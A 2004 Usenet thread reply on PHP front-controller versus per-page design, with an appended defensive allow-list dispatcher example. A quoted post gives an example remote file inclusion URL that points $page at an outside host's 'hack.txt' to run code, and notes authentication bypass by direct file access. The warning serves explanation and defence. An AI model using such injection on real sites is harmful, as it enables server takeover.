Re: Design Model Question

From: Tony Marston (tony_at_NOSPAM.demon.co.uk)
Date: 06/26/04


Date: Sat, 26 Jun 2004 18:22:53 +0100


"Chung Leong" <chernyshevsky@hotmail.com> wrote in message
news:S7KdnSV5iPDyJEHdRVn-jA@comcast.com...
> "Mike Sutton" <sutton128@yahoo.com> wrote in message
> news:7eb017e9.0406251338.35a2900d@posting.google.com...
> >
> > The questions are:
> > Can anyone provide opinions on advantages/disadvantages to each of
> > these models?
> > Can anyone provide the correct terminology to discuss these ideas so
> > that I can look for more, relevant resources.
>
> I was just talking about this in another thread. DON'T USE THE SINGLE
> ENTRY POINT ARCHITECTURE! It offers no advantages at all, while its
> disadvantages are numerous. First and foremost, this architecture is one
> of the leading causes of security breaches in PHP sites. By setting $page
> to an Internet address
> (http://www.example.net/page=http://128.34.123.34/hack.txt), I can run
> arbitrary code on your server. And I can bypass your authentication
> scheme by simply typing in the address to the file that you're including
> (http://www.example.net/AccountIndex.php).
>
> People who use this kind of scheme, I dare say, don't have a strong
> programming background. Those who have programmed in C/C++ or other
> procedural languages know that you include a file to make additional
> functionality available, not to cause something to occur. Think about
> it, when you use require() you're just stating the file is needed by the
> current script.
>
> The proper way to share code between scripts is to enclose it in
> functions, keep these in a separate file, include it where it's needed,
> then call the functions. Or for the sake of convenience, just include it
> in every script.

A single entry point architecture is sometimes known as a Front Controller
as every request goes through a single page. I much prefer having a separate
URL for each page as it gives me all the control I need without any of the
security problems. Take a look at
http://www.tonymarston.net/php-mysql/sample-application.html for a
description of a sample application which you can run online. There is also
a link to download all the code.

HTH.

-- 
Tony Marston
http://www.tonymarston.net
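For readers weighing the two posts above, here is an added example (written for this archive, not code from either poster or from Tony's sample application) of a single entry point that avoids the two problems Chung describes: the request value is only ever used as a key into a fixed allow-list, so nothing from the query string reaches include(), and each page file merely defines a function, so requesting it directly does nothing. The page directory, session check and handler names are assumptions.

```php
<?php
// Added example: a front controller that never passes request data to
// include(). The page name is looked up in a fixed allow-list, and each
// page file only defines a function that the dispatcher calls, so browsing
// straight to the file (as in the AccountIndex.php example) runs nothing.
declare(strict_types=1);

// Constructed allow-list: request key => handler file, function, auth flag.
// The files are assumed to live outside the web root, so they cannot be
// requested directly and cannot bypass the checks in dispatch().
const PAGES = [
    'home'    => ['file' => 'home.php',    'func' => 'page_home',    'auth' => false],
    'account' => ['file' => 'account.php', 'func' => 'page_account', 'auth' => true],
];
const PAGE_DIR = __DIR__ . '/../app/pages';   // assumed, not web-accessible

function is_authenticated(): bool
{
    // Assumed session check; substitute the application's own logic.
    return !empty($_SESSION['user_id']);
}

function dispatch(string $requested): string
{
    // Exact-match lookup against the allow-list; anything else is a 404.
    // A URL such as http://host/hack.txt can never match a key here, so
    // remote or unexpected files are never included.
    if (!array_key_exists($requested, PAGES)) {
        http_response_code(404);
        return 'Not found';
    }
    $page = PAGES[$requested];
    // Authentication is enforced here, in the one place every request passes.
    if ($page['auth'] && !is_authenticated()) {
        http_response_code(403);
        return 'Login required';
    }
    // The included file only defines page_home() / page_account() (the
    // "functions in a separate file" approach); nothing executes until the
    // dispatcher calls the handler by name.
    require_once PAGE_DIR . '/' . $page['file'];
    return ($page['func'])();
}

session_start();
echo dispatch($_GET['page'] ?? 'home');
```

Each page file under PAGE_DIR contains only a function definition (for example `function page_account(): string { ... }`), so it can be included on any request without side effects.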

